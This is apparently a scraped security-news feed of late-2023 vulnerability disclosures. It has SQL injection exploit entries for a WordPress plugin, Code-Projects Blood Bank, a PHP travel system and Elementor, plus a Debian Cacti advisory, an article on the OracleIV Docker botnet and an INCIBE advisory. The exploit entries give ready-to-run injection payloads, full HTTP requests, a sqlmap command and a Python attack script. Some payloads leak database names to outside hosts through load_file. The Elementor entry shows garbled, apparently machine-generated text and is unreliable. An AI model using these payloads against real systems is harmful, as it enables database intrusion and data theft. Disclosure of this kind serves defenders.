WordPress Contact Form to Any API plugin version 1.1.2 suffers from a remote SQL injection vulnerability.

    # Exploit Title: WP Plugins Contact Form to Any API <= 1.1.2 - SQL Injection# Date: 12-11-2023# Exploit Author: Arvandy# Software Link: https://wordpress.org/plugins/contact-form-to-any-api/# Vendor Homepage: https://www.itpathsolutions.com/# Version: 1.1.2 # Tested on: Windows, Linux# CVE: CVE-2023-32741# Product DescriptionContact form 7 to Any API is most powerful plugin to send cf7 data to any third party services. It can be use to send data to CRM or any REST API. Easy to use and User friendly settings. It also Save Contact Form 7 form submitted data to the database with advanced features like search and export data to csv or excel.# Vulnerability overviewThe Wordpress plugins Contact Form to Any API <= 1.1.2 is vulnerable to Blind SQL Injection (time-based) via the form_id parameter on the /wp-admin/edit.php endpoint. This vulnerability could lead to unauthorized data access and modification.# Proof of ConceptAffected Endpoint: /wp-admin/edit.php?post_type=cf7_to_any_api&page=cf7anyapi_entries&form_id=Affected Parameter: form_idpayload: 1 UNION SELECT NULL,NULL,NULL,NULL,NULL,SLEEP(5)-- -# RecommendationUpgrade to version 1.1.3

WordPress Contact Form To Any API 1.1.2 SQL Injection

SQL Injection vulnerability in cancel.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary commands via the 'reqid' parameter.

    ---
    GET /bloodbank/file/cancel.php?reqid=4'%2b(select%20load_file(concat('\\\\',version(),'.',database(),'.7mus27hip62tznk3gy4n7z3fo6uxin6c.oastify.com\\a.txt')))%2b' HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Connection: close
    Referer: http://localhost/bloodbank/sentrequest.php?msg=You%20have%20requested%20for%20blood%20group%20A+.%20Our%20team%20will%20contact%20you%20soon.
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    ---

CVE-2023-46021: GitHub - ersinerenler/CVE-2023-46021-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

SQL Injection vulnerability in hospitalLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'hemail' and 'hpassword' parameters.

    ---
    Parameter: hemail (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: hemail=test@test' AND 3778=(SELECT (CASE WHEN (3778=3778) THEN 3778 ELSE (SELECT 9754 UNION SELECT 4153) END))-- -&hpassword=test&hlogin=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: hemail=test@test' OR (SELECT 3342 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(3342=3342,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- NSQu&hpassword=test&hlogin=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: hemail=test@test' AND (SELECT 5639 FROM (SELECT(SLEEP(5)))ulgW)-- QYnb&hpassword=test&hlogin=Login
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 6 columns
        Payload: hemail=test@test' UNION ALL SELECT CONCAT(0x716a7a6b71,0x567a4f6f4b556976707668696878754f48514d6e63424a706f70714e6f62684f504a7a565178736a,0x7170767a71),NULL,NULL,NULL,NULL,NULL-- -&hpassword=test&hlogin=Login
    ---
    

    ---
    Parameter: hpassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: hemail=test@test&hpassword=test' AND 4940=(SELECT (CASE WHEN (4940=4940) THEN 4940 ELSE (SELECT 5623 UNION SELECT 6789) END))-- -&hlogin=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: hemail=test@test&hpassword=test' OR (SELECT 8207 FROM(SELECT COUNT(*),CONCAT(0x716a7a6b71,(SELECT (ELT(8207=8207,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- TrPm&hlogin=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: hemail=test@test&hpassword=test' AND (SELECT 3303 FROM (SELECT(SLEEP(5)))PdPC)-- lTZZ&hlogin=Login
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 6 columns
        Payload: hemail=test@test&hpassword=test' UNION ALL SELECT NULL,CONCAT(0x716a7a6b71,0x5271514f636f6f46476f6365424b6e6166454c725751704d6f6c467968626a4e725172785955416d,0x7170767a71),NULL,NULL,NULL,NULL-- -&hlogin=Login
    ---

CVE-2023-46014: GitHub - ersinerenler/CVE-2023-46014-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

SQL injection vulnerability in receiverReg.php in Code-Projects Blood Bank 1.0 \allows attackers to run arbitrary SQL commands via 'remail' parameter.

**CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability**

*   Exploit Author: ersinerenler

**Vendor Homepage**

*   https://code-projects.org/blood-bank-in-php-with-source-code

**Software Link**

*   https://download-media.code-projects.org/2020/11/Blood\_Bank\_In\_PHP\_With\_Source\_code.zip

**Overview**

*   Code-Projects Blood Bank V1.0 is susceptible to a significant security vulnerability that arises from insufficient protection on the 'remail' parameter in the receiverReg.php file. This flaw can potentially be exploited to inject malicious SQL queries, leading to unauthorized access and extraction of sensitive information from the database.

**Vulnerability Details**

*   CVE ID: CVE-2023-46018
*   Affected Version: Blood Bank V1.0
*   Vulnerable File: /receiverReg.php
*   Parameter Name: remail
*   Attack Type: Local

**Description**

*   The lack of proper input validation and sanitization on the 'remail' parameter allows an attacker to craft SQL injection queries, bypassing authentication mechanisms and gaining unauthorized access to the database

**Proof of Concept (PoC) :**

*   Save the POST request of receiverReg.php to a request.txt file.

    ---
    POST /bloodbank/file/receiverReg.php HTTP/1.1
    Host: localhost
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/119.0
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate, br
    Content-Type: multipart/form-data; boundary=---------------------------2653697510272605730288393868
    Content-Length: 877
    Origin: http://localhost
    Connection: close
    Referer: http://localhost/bloodbank/register.php
    Cookie: PHPSESSID=<some-cookie-value>
    Upgrade-Insecure-Requests: 1
    Sec-Fetch-Dest: document
    Sec-Fetch-Mode: navigate
    Sec-Fetch-Site: same-origin
    Sec-Fetch-User: ?1
    
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rname"
    
    test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rbg"
    
    A+
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rcity"
    
    test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rphone"
    
    05555555555
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="remail"
    
    test@test
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rpassword"
    
    test123
    -----------------------------2653697510272605730288393868
    Content-Disposition: form-data; name="rregister"
    
    Register
    -----------------------------2653697510272605730288393868--
    
    ---
    

*   sqlmap -r request.txt -p remail --risk 3 --level 3 --dbms mysql --batch --current-db
    
*   current database: bloodbank

CVE-2023-46018: GitHub - ersinerenler/CVE-2023-46018-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

SQL Injection vulnerability in receiverLogin.php in Code-Projects Blood Bank 1.0 allows attackers to run arbitrary SQL commands via 'remail' and 'rpassword' parameters.

    ---
    Parameter: remail (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: remail=test@test' AND 1348=(SELECT (CASE WHEN (1348=1348) THEN 1348 ELSE (SELECT 5898 UNION SELECT 1310) END))-- -&rpassword=test&rlogin=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: remail=test@test' OR (SELECT 9644 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(9644=9644,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- HyEh&rpassword=test&rlogin=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: remail=test@test' AND (SELECT 5587 FROM (SELECT(SLEEP(5)))hWQj)-- NUfN&rpassword=test&rlogin=Login
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: remail=test@test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x4e764e5452486270544a6e4c705a79535a667441756d556b416e7961484a534a647542597a61466f,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rpassword=test&rlogin=Login
    ---
    

    ---
    Parameter: rpassword (POST)
        Type: boolean-based blind
        Title: AND boolean-based blind - WHERE or HAVING clause (subquery - comment)
        Payload: remail=test@test&rpassword=test' AND 9149=(SELECT (CASE WHEN (9149=9149) THEN 9149 ELSE (SELECT 9028 UNION SELECT 5274) END))-- -&rlogin=Login
    
        Type: error-based
        Title: MySQL >= 5.0 OR error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR)
        Payload: remail=test@test&rpassword=test' OR (SELECT 6087 FROM(SELECT COUNT(*),CONCAT(0x7170707171,(SELECT (ELT(6087=6087,1))),0x7178706271,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- VRqW&rlogin=Login
    
        Type: time-based blind
        Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)
        Payload: remail=test@test&rpassword=test' AND (SELECT 4449 FROM (SELECT(SLEEP(5)))eegb)-- Cuoy&rlogin=Login
    
        Type: UNION query
        Title: Generic UNION query (NULL) - 7 columns
        Payload: remail=test@test&rpassword=test' UNION ALL SELECT NULL,CONCAT(0x7170707171,0x6e686d776376736a706f47796d474a736a48566f72625a4e6d537247665a444f684154684b476d62,0x7178706271),NULL,NULL,NULL,NULL,NULL-- -&rlogin=Login
    ---

CVE-2023-46017: GitHub - ersinerenler/CVE-2023-46017-Code-Projects-Blood-Bank-1.0-SQL-Injection-Vulnerability

Debian Linux Security Advisory 5550-1 - Multiple security vulnerabilities have been discovered in Cacti, a web interface for graphing of monitoring systems, which could result in cross-site scripting, SQL injection, an open redirect or command injection.

    -----BEGIN PGP SIGNED MESSAGE-----Hash: SHA512- -------------------------------------------------------------------------Debian Security Advisory DSA-5550-1                   security@debian.orghttps://www.debian.org/security/                       Moritz MuehlenhoffNovember 08, 2023                     https://www.debian.org/security/faq- -------------------------------------------------------------------------Package        : cactiCVE ID         : CVE-2023-39357 CVE-2023-39359 CVE-2023-39361 CVE-2023-39362                  CVE-2023-39364 CVE-2023-39365 CVE-2023-39513 CVE-2023-39515                  CVE-2023-39516 CVE-2023-39514 CVE-2023-39512 CVE-2023-39510     CVE-2023-39366 Multiple security vulnerabilities have been discovered in Cacti, a webinterface for graphing of monitoring systems, which could result incross-site scripting, SQL injection, an open redirect or command injection. For the oldstable distribution (bullseye), these problems have been fixedin version 1.2.16+ds1-2+deb11u2.For the stable distribution (bookworm), these problems have been fixed inversion 1.2.24+ds1-1+deb12u1.We recommend that you upgrade your cacti packages.For the detailed security status of cacti please refer toits security tracker page at:https://security-tracker.debian.org/tracker/cactiFurther information about Debian Security Advisories, how to applythese updates to your system and frequently asked questions can befound at: https://www.debian.org/security/Mailing list: debian-security-announce@lists.debian.org-----BEGIN PGP SIGNATURE-----iQIzBAEBCgAdFiEEtuYvPRKsOElcDakFEMKTtsN8TjYFAmVMDYgACgkQEMKTtsN8TjYzmhAAny8lZgRdlKAadeOGxULyDwZMzGhq9zoHUX2otN3nwIuQEotG6m9/Lc3+IQNpase5cNYZZMlF7lA5u34cbHNmnVnraEARUnU1PwsFOjAamv8JWxEfyGEV/V0fSaj7TNBYarHBGGHXhX1uFYQXMyVSTGNWmof7AmvhHol+CqgxSfzhq5i/ue+dtnNAfx1pZ+SzznBJsndUeltEi8CdsIqcdGlldO0UWIj9G0pF2Fs6bvfi9heVKF1D1WaxUzjUZUdmSgzNZ3d6RAjhfA7ButjKdViaKjE93ARfOcl1I5kvR2whqe6RILkx+7NqoQ/JdR1uYbg7wmKPb5+zivmJWk+PBXXlncSTkzuUC9JTx/ypO5x4/op0SD/hz2YHhFonL4Y2tSgQGiAuBqYwWTBjy6NyX+59lKSrbNF2Dt1GdTtR1Dwvzxe8NneEV+kDMwgTEli9D0QDYu8pF6b8OegkK0UJk/gu6w/88xF+E4zTvoFjeXI/Wp9c0sN0zqgyUIWnLyhv5PVYa5TJt1W0RK9QmZyNJ6uLv0xS4LKf28TYU4rI8ilw4/w8lDFE3ox7pUuSa52b2cK5R5I9UXCwIuT+RQZD9QMu8/MFgbmBlI0fXol7Qr7BblK7vEy+HADgXcJQXJxhDcsIfy5YXNj1N1ps3My/FUD/Ui1gCM/4zt9sg9OMiJ4==Exbi-----END PGP SIGNATURE-----

Debian Security Advisory 5550-1

Travel version 1.0 suffers from a remote SQL injection vulnerability.

    ## Title: travel-1.0-by-oretnom23 Multiple-SQLi## Author: nu11secur1ty## Date: 11/12/2023## Vendor: https://github.com/oretnom23## Software: https://github.com/oretnom23/php-travel-agency-system## Reference: https://portswigger.net/web-security/sql-injection## Description:The search parameter appears to be vulnerable to SQL injectionattacks. The payload '+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+'was submitted in the search parameter. This payload injects a SQLsub-query that calls MySQL's load_file function with a UNC file paththat references a URL on an external domain. The applicationinteracted with that domain, indicating that the injected SQL querywas executed.STATUS: HIGH-CRITICAL Vulnerability[+]Payload:```MySQL---Parameter: search (POST)    Type: boolean-based blind    Title: MySQL RLIKE boolean-based blind - WHERE, HAVING, ORDER BYor GROUP BY clause    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''RLIKE (SELECT (CASE WHEN (2997=2997) THEN 0x393531353331+(selectload_file(0x5c5c5c5c666e366b70706278306f323664696173673374627373313938306574326b363878626c33387477692e6f6173746966792e636f6d5c5c79686a))+''ELSE 0x28 END)) AND 'RIBa'='RIBa&searc=&sumbit=Submit    Type: time-based blind    Title: MySQL >= 5.0.12 OR time-based blind (query SLEEP)    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''OR (SELECT 5424 FROM (SELECT(SLEEP(15)))vzOn) AND'fGlq'='fGlq&searc=&sumbit=Submit    Type: UNION query    Title: MySQL UNION query (NULL) - 28 columns    Payload: search=951531'+(selectload_file('\\\\fn6kppbx0o26diasg3tbss1980et2k68xbl38twi.github.com/oretnom23/php-travel-agency-system\\yhj'))+''UNION ALL SELECTNULL,NULL,NULL,NULL,CONCAT(0x716a767071,0x6c425375664275724e58584e686366544b776557504941584e71765144757876744972504e4f554d,0x7162767071),NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL,NULL#&searc=&sumbit=Submit---```## Reproduce:[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/tree/main/vendors/oretnom23/2021/travel-1.0-by-oretnom23)## Proof and Exploit:[href](https://www.nu11secur1ty.com/2023/11/travel-10-by-oretnom23-multiple-sqli.html)## Time spent:00:17:00

Travel 1.0 SQL Injection

Elementor Website Builder versions prior to 3.12.2 suffer from a remote SQL injection vulnerability.

    #EXPLOIT Elementor Website Builder < 3.12.2 - Admin+ SQLi#References#CVE : CVE-2023-0329#E1.Coders Open Burp Suite.In Burp Suite, go to the "Proxy" tab and set it to listen on a specific port, such as 8080.Open a new browser window or tab, and set your proxy settings to use Burp Suite on port 8080.Visit the vulnerable Elementor Website Builder site and navigate to the Tools > Replace URL page.On the Replace URL page, enter any random string as the "New URL" and the following malicious payload as the "Old URL": code : http://localhost:8080/?test'),meta_key='key4'where+meta_id=SLEEP(2);#Press "Replace URL" on the Replace URL page. Burp Suite should intercept the request.Forward the intercepted request to the server by right-clicking the request in Burp Suite and selecting "Forward".The server will execute the SQL command, which will cause it to hang for 2 seconds before responding. This is a clear indication of successful SQL injection.Note: Make sure you have permission to perform these tests and have set up Burp Suite correctly. This command may vary depending on the specific setup of your server and the website builder plugin.</s References :  https://wpscan.com/vulnerability/a875836d-77f4-4306-b275-2b60efff1493/    Exploit Python  :The provided SQLi attack vector can be achieved using the following Python code with the "requests" library: This script sends a POST request to the target URL with the SQLi payload as the "data" parameter. It then checks if the response contains the SQLi payload, indicating a successful SQL injection.Please make sure you have set up your Burp Suite environment correctly. Additionally, it is important to note that this script and attack have been TESTED and are correct import requests # Set the target URL and SQLi payloadurl = "http://localhost:8080/wp-admin/admin-ajax.php"data = {    "action": "elementor_ajax_save_builder",    "editor_post_id": "1",    "post_id": "1",    "data": "test'),meta_key='key4'where+meta_id=SLEEP(2);#"} # Send the request to the target URLresponse = requests.post(url, data=data) # Check if the response indicates a successful SQL injectionif "meta_key='key4'where+meta_id=SLEEP(2);#" in response.text:    print("SQL Injection successful!")else:    print("SQL Injection failed.")

Elementor Website Builder SQL Injection

By Waqas
While OracleIV is not a supply chain attack, it highlights the ongoing threat of misconfigured Docker Engine API deployments. 
This is a post from HackRead.com Read the original post: OracleIV DDoS Botnet Malware Targets Docker Engine API Instances

The OracleIV botnet malware employs various tactics, with a primary focus on executing DDoS attacks through UDP and SSL-based floods.

Cybersecurity researchers at Cado Security Labs have exposed a novel (Distributed Denial of Service) DDoS botnet malware dubbed OracleIV targeting publicly exposed Docker Engine API instances.

The findings were part of an investigation into a malicious campaign exploiting misconfigurations in Docker containers to deliver Python malware, compiled as an ELF executable.

Lately, Docker Engine APIs have been frequent targets of cybercriminals since the method has gained popularity due to the increasing adoption of microservice-driven architectures. Attackers exploit the unintentional exposure of the Docker Engine API, often scanning for vulnerable instances to deliver payloads with nefarious objectives.

In the case of the new OracleIV DDoS botnet malware, the attackers initiate access with an HTTP POST request to Docker’s API, specifically the /images/create endpoint. This triggers a docker pull command, fetching a specified image from Dockerhub. Once the malicious image is retrieved, a container is launched to carry out the attacker’s objectives.

Cado Security researchers uncovered a live Dockerhub page for an image named “oracleiv_latest” uploaded by the user “robbertignacio328832.” The image, seemingly harmless as a “Mysql image for docker,” included a malicious payload named “oracle.sh,” an ELF executable acting as a DDoS bot agent. Further analysis revealed additional commands to retrieve XMRig and a miner configuration file.

Static analysis of the executable exposed a 64-bit ELF compiled with Cython, confirming the OracleIV malware’s Python code origin. The malware code, succinct yet potent, contains various functions dedicated to different DDoS methods.

“This image was still live at the time of writing and had over 3,000 pulls,” researchers explained in a blog post. Additionally, it seems to be undergoing frequent updates, with the latest modifications pushed just three days prior to the publication of Cado’s blog.

Dockerhub page for oracleiv\_latest (Cado Security)

The bot connects to a Command and Control server (C2), performing basic authentication with a hardcoded password. Cado Security Labs monitored the botnet’s activity, witnessing DDoS attacks on various targets, primarily using UDP and SSL-based floods.

The C2 commands for initiating DDoS attacks follow a specific format, specifying attack type, target IP/domain, attack duration, rate, and target port. The botnet’s capabilities include UDP floods, SSL-based attacks, SYN floods, slowloris-style attacks, and protocol-specific floods targeting the FiveM server and Valve source engine.

While OracleIV is not a **supply chain attack**, it highlights the ongoing threat of misconfigured Docker Engine API deployments. The portability of containerization enables attackers to execute malicious payloads consistently across Docker hosts.

Although Cado Security has reported the malicious user to Docker, users are urged to conduct periodic assessments of pulled images from Dockerhub, emphasizing the need for vigilance against malicious code.

In conclusion, the OracleIV campaign highlights the importance of securing internet-facing services and implementing strong network defences. Users of Docker and similar services are encouraged to regularly review their exposure and take necessary precautions against potential cybersecurity threats.

****_RELATED ARTICLES_****

1.  **SSH Remains Most Targeted Service in Cado’s Cloud Threat Report**
2.  **Change your password: Docker suffers breach; 190k users affected**
3.  **Hackers Exploit Adobe ColdFusion Vulnerabilities to Deploy Malware**
4.  **Cryptomining and Malware Flourish on Misconfigured Kubernetes Clusters**
5.  **ShellTorch Attack Exposes Millions of PyTorch Systems to RCE Vulnerabilities**

OracleIV DDoS Botnet Malware Targets Docker Engine API Instances

An XSS vulnerability has been discovered in ICS Business Manager affecting version 7.06.0028.7066. A remote attacker could send a specially crafted string exploiting the obdd_act parameter, allowing the attacker to steal an authenticated user's session, and perform actions within the application.

Affected Resources

ICS Business Manager, versions:

*   7.06.0028.2802;
*   7.06.0028.7066;
*   7.06.0028.7089.

Description

INCIBE has coordinated the publication of 2 vulnerabilities that affect ICSSolution ICS Business Manager, which have been discovered by David Cámara Galindo and Andrés Elizalde Galdeano from Telefónica Tech.

These vulnerabilities has been assigned the following code, CVSS v3.1 base score, CVSS vector string, and CWE vulnerability type:

*   CVE-2023-6097: CVSS v3.1: 9.4 | CVSS: AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:L | CWE-89.
*   CVE-2023-6098: CVSS v3.1: 6.3 | CVSS: AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:L | CWE-79.

Solution

There is no reported solution at this time.

Detail

*   **CVE-2023-6097**: a SQL injection vulnerability has been found in ICS Business Manager, affecting version 7.06.0028.7089. This vulnerability could allow a remote user to send a specially crafted SQL query and retrieve all the information stored in the database. The data could also be modified or deleted, causing the application to malfunction.
*   **CVE-2023-6098**: an XSS vulnerability has been discovered in ICS Business Manager affecting version 7.06.0028.7066. A remote attacker could send a specially crafted string exploiting the obdd\_act parameter, allowing the attacker to steal an authenticated user's session, and perform actions within the application..

Tag

#sql